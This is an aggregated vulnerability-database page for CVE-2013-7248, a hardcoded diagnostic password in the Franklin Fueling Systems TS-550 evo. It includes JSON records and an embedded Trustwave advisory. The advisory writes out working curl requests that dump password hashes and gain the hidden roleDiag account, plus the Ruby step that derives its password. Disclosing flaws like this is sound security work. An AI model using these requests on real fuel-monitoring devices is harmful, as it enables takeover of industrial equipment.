CVE-2013-7248 (GCVE-0-2013-7248)

Vulnerability from cvelistv5 – Published: 2014-01-26 01:00 – Updated: 2024-08-06 18:01

Summary

Severity ?

No CVSS data available.

CWE

Assigner

mitre

References

URL

GHSA-RG6R-Q2RV-884M

Vulnerability from github – Published: 2022-05-17 04:54 – Updated: 2022-05-17 04:54

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2013-7248"
  ],
  "database_specific": {
    "cwe_ids": [],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2014-01-26T01:55:00Z",
    "severity": "HIGH"
  },
  "details": "Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST.",
  "id": "GHSA-rg6r-q2rv-884m",
  "modified": "2022-05-17T04:54:08Z",
  "published": "2022-05-17T04:54:08Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-7248"
    },
    {
      "type": "WEB",
      "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

VAR-201401-0296

Vulnerability from variot - Updated: 2023-12-18 13:29

Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST. Franklin Fueling Systems TS-550 evo is prone to a security-bypass vulnerability. Attackers can exploit this issue to bypass the authentication mechanism and gain access to the vulnerable device. Franklin Fueling Systems 2.0.0.6833 is vulnerable; other versions may also be affected. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. A remote attacker can use this to gain root privileges and take full control of the device. Affects prior to version 2.4.0

Product description: A fuel management system with a programmable interface used for inventory and delivery management.

Finding 1: Insufficient Access Control Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs CVE: CVE-2013-7247 CWE: CWE-200

As the Guest user (the lowest privilege), a user can post the cmdWebGetConfiguration parameter to cgi-bin/tsaws.cgi. This will return the usernames and password hashes (in DES format) for all users of the application. Once dumped, they can be cracked and used to access authenticated portions of the application.

Request

curl -H "Content-Type:text/xml" --data '' http://:10001/cgi-bin/tsaws.cgi

Response

Finding 2: Hardcoded Technician Credentials Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs CVE: CVE-2013-7248 CWE: CWE-798

The three primary users on the TS550 are roleGuest, roleUser, and roleAdmin. Another user exists with additional access named roleDiag. This user can access extra portions of the application such as the command line interface, enable and disable SSH, as well as run SQL commands all from the web interface. The CLI interface includes the ability to run engineering and manufacturing commands. The password for roleDiag is the key (a value returned with every POST request to tsaws.cgi) DES encrypted. This can be done in Ruby:

$ irb 1.9.3p374 :001 > "11111111".crypt("aa") => "aaDTlAa1fGGC."

Request

curl -H "Content-Type:text/xml" --data '' http://:10001/cgi-bin/tsaws.cgi

Response (note the ROLE)

The password can then be used to run various roleDiag commands. An attacker can enable SSH, and since root's password is the same as roleAdmin, they can completely compromise the device. However, Trustwave SpiderLabs have not verified this fix.

Revision History: 04/16/13 - Vulnerability disclosed to vendor 12/18/13 - Fix released on a limited basis by vendor 01/03/14 - Advisory published

References 1. http://www.franklinfueling.com/evo/

About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com

About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs

Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201401-0296",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "ts-550 evo",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "franklinfueling",
        "version": "2.3.1.7492"
      },
      {
        "model": "ts-550 evo",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "franklinfueling",
        "version": "2.0.0.6833"
      },
      {
        "model": "ts-550 evo",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "franklinfueling",
        "version": null
      },
      {
        "model": "ts-550 evo",
        "scope": null,
        "trust": 0.8,
        "vendor": "franklin fueling",
        "version": null
      },
      {
        "model": "ts-550 evo",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "franklin fueling",
        "version": "2.0.0.6833"
      },
      {
        "model": "ts-550 evo",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "franklin fueling",
        "version": "2.4.0"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005929"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7248"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201401-538"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:franklinfueling:ts-550_evo_firmware:2.3.1.7492:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:franklinfueling:ts-550_evo_firmware:2.0.0.6833:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:franklinfueling:ts-550_evo:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-7248"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Nate Drier and Matt Jakubowski of TrustWave SpiderLabs",
    "sources": [
      {
        "db": "BID",
        "id": "65041"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2013-7248",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2013-7248",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "VHN-67250",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2013-7248",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201401-538",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-67250",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-67250"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005929"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7248"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201401-538"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST. Franklin Fueling Systems TS-550 evo is prone to a security-bypass vulnerability. \nAttackers can exploit this issue to bypass the authentication mechanism and gain access to the vulnerable device. \nFranklin Fueling Systems 2.0.0.6833 is vulnerable; other versions may also be affected. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. A remote attacker can use this to gain root privileges and take full control of the device.  Affects prior to version\n2.4.0\n\nProduct description:\nA fuel management system with a programmable interface used for inventory\nand delivery management. \n\nFinding 1: Insufficient Access Control\nCredit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs\nCVE: CVE-2013-7247\nCWE: CWE-200\n\nAs the Guest user (the lowest privilege), a user can post the\ncmdWebGetConfiguration parameter to cgi-bin/tsaws.cgi. This will return the\nusernames and password hashes (in DES format) for all users of the\napplication. Once dumped, they can be cracked and used to access\nauthenticated portions of the application. \n\n\n#Request\n\ncurl -H \"Content-Type:text/xml\" --data \u0027\u003cTSA_REQUEST_LIST\u003e\u003cTSA_REQUEST COMMAND=\"cmdWebGetConfiguration\"/\u003e\u003c/TSA_REQUEST_LIST\u003e\u0027 http://\u003cip\u003e:10001/cgi-bin/tsaws.cgi\n\n#Response\n\n\u003cTSA_RESPONSE_LIST VERSION=\"2.0.0.6833\" TIME_STAMP=\"2013-02-19T22:09:22Z\" TIME_STAMP_LOCAL=\"2013-02-19T17:09:22\" KEY=\"11111111\" ROLE=\"roleGuest\"\u003e\u003cTSA_RESPONSE COMMAND=\"cmdWebGetConfiguration\"\u003e\u003cCONFIGURATION\u003e\n    \u003cDEBUGGING LOGGING_ENABLED=\"false\" LOGGING_PATH=\"/tmp\"/\u003e\n    \u003cROLE_LIST\u003e\n        \u003cROLE NAME=\"roleAdmin\" PASSWORD=\"YrKMc2T2BuGvQ\"/\u003e\n        \u003cROLE NAME=\"roleUser\" PASSWORD=\"2wd2DlEKUPTr2\"/\u003e\n        \u003cROLE NAME=\"roleGuest\" PASSWORD=\"YXFCsq2GXFQV2\"/\u003e\n    \u003c/ROLE_LIST\u003e\n\u003c/CONFIGURATION\u003e\u003c/TSA_RESPONSE\u003e\u003c/TSA_RESPONSE_LIST\u003e\n\nFinding 2: Hardcoded Technician Credentials\nCredit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs\nCVE: CVE-2013-7248\nCWE: CWE-798\n\nThe three primary users on the TS550 are roleGuest, roleUser, and\nroleAdmin.  Another user exists with additional access named roleDiag. This\nuser can access extra portions of the application such as the command line\ninterface, enable and disable SSH, as well as run SQL commands all from the\nweb interface.  The CLI interface includes the ability to run engineering\nand manufacturing commands.  The password for roleDiag is the key (a value\nreturned with every POST request to tsaws.cgi) DES encrypted.  This can be\ndone in Ruby:\n\n\n$ irb\n1.9.3p374 :001 \u003e \"11111111\".crypt(\"aa\")\n =\u003e \"aaDTlAa1fGGC.\"\n\n#Request\n\ncurl -H \"Content-Type:text/xml\" --data \u0027\u003cTSA_REQUEST_LIST PASSWORD=\"aaDTlAa1fGGC.\"\u003e\u003cTSA_REQUEST COMMAND=\"cmdWebCheckRole\"/\u003e\u003c/TSA_REQUEST_LIST\u003e\u0027 http://\u003cip\u003e:10001/cgi-bin/tsaws.cgi\n\n#Response (note the ROLE)\n\n\u003cTSA_RESPONSE_LIST VERSION=\"2.0.0.6833\" TIME_STAMP=\"2013-03-04T16:53:01Z\" TIME_STAMP_LOCAL=\"2013-03-04T11:53:01\" KEY=\"11111111\" ROLE=\"roleDiag\"\u003e\u003cTSA_RESPONSE COMMAND=\"cmdWebCheckRole\"\u003e\u003c/TSA_RESPONSE\u003e\u003c/TSA_RESPONSE_LIST\u003e\n\nThe password can then be used to run various roleDiag commands. An attacker\ncan enable SSH, and since root\u0027s password is the same as roleAdmin, they\ncan completely compromise the device. However, Trustwave SpiderLabs have not verified this fix. \n\n\nRevision History:\n04/16/13 - Vulnerability disclosed to vendor\n12/18/13 - Fix released on a limited basis by vendor\n01/03/14 - Advisory published\n\nReferences\n1. http://www.franklinfueling.com/evo/\n\n\nAbout Trustwave:\nTrustwave is the leading provider of on-demand and subscription-based\ninformation security and payment card industry compliance management\nsolutions to businesses and government entities throughout the world. For\norganizations faced with today\u0027s challenging data security and compliance\nenvironment, Trustwave provides a unique approach with comprehensive\nsolutions that include its flagship TrustKeeper compliance management\nsoftware and other proprietary security solutions. Trustwave has helped\nthousands of organizations--ranging from Fortune 500 businesses and large\nfinancial institutions to small and medium-sized retailers--manage\ncompliance and secure their network infrastructure, data communications and\ncritical information assets. Trustwave is headquartered in Chicago with\noffices throughout North America, South America, Europe, Africa, China and\nAustralia. For more information, visit https://www.trustwave.com\n\nAbout Trustwave\u0027s SpiderLabs:\nSpiderLabs(R) is the advanced security team at Trustwave focused on\napplication security, incident response, penetration testing, physical\nsecurity and security research. The team has performed over a thousand\nincident investigations, thousands of penetration tests and hundreds of\napplication security tests globally. In addition, the SpiderLabs Research\nteam provides intelligence through bleeding-edge research and proof of\nconcept tool development to enhance Trustwave\u0027s products and services. \nhttps://www.trustwave.com/spiderlabs\n\nDisclaimer:\nThe information provided in this advisory is provided \"as is\" without\nwarranty of any kind. Trustwave disclaims all warranties, either express or\nimplied, including the warranties of merchantability and fitness for a\nparticular purpose. In no event shall Trustwave or its suppliers be liable\nfor any damages whatsoever including direct, indirect, incidental,\nconsequential, loss of business profits or special damages, even if\nTrustwave or its suppliers have been advised of the possibility of such\ndamages. Some states do not allow the exclusion or limitation of liability\nfor consequential or incidental damages so the foregoing limitation may not\napply. \n\n________________________________\n\nThis transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-7248"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005929"
      },
      {
        "db": "BID",
        "id": "65041"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67250"
      },
      {
        "db": "PACKETSTORM",
        "id": "124873"
      }
    ],
    "trust": 2.07
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-67250",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-67250"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-7248",
        "trust": 2.9
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005929",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201401-538",
        "trust": 0.7
      },
      {
        "db": "BID",
        "id": "65041",
        "trust": 0.4
      },
      {
        "db": "PACKETSTORM",
        "id": "124873",
        "trust": 0.2
      },
      {
        "db": "EXPLOIT-DB",
        "id": "31180",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-67250",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-67250"
      },
      {
        "db": "BID",
        "id": "65041"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005929"
      },
      {
        "db": "PACKETSTORM",
        "id": "124873"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7248"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201401-538"
      }
    ]
  },
  "id": "VAR-201401-0296",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-67250"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T13:29:47.387000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "TS-550 evo",
        "trust": 0.8,
        "url": "http://www.franklinfueling.com/americas/en/ts-550-evo"
      },
      {
        "title": "ts550evo-2327608",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=47720"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005929"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201401-538"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-255",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-67250"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005929"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7248"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.8,
        "url": "https://www.trustwave.com/spiderlabs/advisories/twsl2014-001.txt"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-7248"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-7248"
      },
      {
        "trust": 0.3,
        "url": "http://www.franklinfueling.com/americas/en"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7247"
      },
      {
        "trust": 0.1,
        "url": "http://www.franklinfueling.com/evo/"
      },
      {
        "trust": 0.1,
        "url": "https://www.trustwave.com/spiderlabs"
      },
      {
        "trust": 0.1,
        "url": "http://www.franklinfueling.com/)"
      },
      {
        "trust": 0.1,
        "url": "http://\u003cip\u003e:10001/cgi-bin/tsaws.cgi"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7248"
      },
      {
        "trust": 0.1,
        "url": "https://www.trustwave.com"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-67250"
      },
      {
        "db": "BID",
        "id": "65041"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005929"
      },
      {
        "db": "PACKETSTORM",
        "id": "124873"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7248"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201401-538"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-67250"
      },
      {
        "db": "BID",
        "id": "65041"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005929"
      },
      {
        "db": "PACKETSTORM",
        "id": "124873"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7248"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201401-538"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-01-26T00:00:00",
        "db": "VULHUB",
        "id": "VHN-67250"
      },
      {
        "date": "2014-01-03T00:00:00",
        "db": "BID",
        "id": "65041"
      },
      {
        "date": "2014-01-28T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-005929"
      },
      {
        "date": "2014-01-21T23:03:33",
        "db": "PACKETSTORM",
        "id": "124873"
      },
      {
        "date": "2014-01-26T01:55:09.890000",
        "db": "NVD",
        "id": "CVE-2013-7248"
      },
      {
        "date": "2014-01-28T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201401-538"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-01-27T00:00:00",
        "db": "VULHUB",
        "id": "VHN-67250"
      },
      {
        "date": "2015-03-19T08:34:00",
        "db": "BID",
        "id": "65041"
      },
      {
        "date": "2014-01-28T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-005929"
      },
      {
        "date": "2014-01-27T15:58:04.223000",
        "db": "NVD",
        "id": "CVE-2013-7248"
      },
      {
        "date": "2014-01-28T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201401-538"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201401-538"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Franklin Fueling Systems TS-550 evo In the firmware  root Privileged vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005929"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "trust management",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201401-538"
      }
    ],
    "trust": 0.6
  }
}

GSD-2013-7248

Vulnerability from gsd - Updated: 2023-12-13 01:22

Details

Aliases

CVE-2013-7248

Aliases

CVE-2013-7248

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2013-7248",
    "description": "Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST.",
    "id": "GSD-2013-7248",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2013-7248"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2013-7248"
      ],
      "details": "Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST.",
      "id": "GSD-2013-7248",
      "modified": "2023-12-13T01:22:18.742974Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2013-7248",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt",
            "refsource": "MISC",
            "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2014-001.txt"
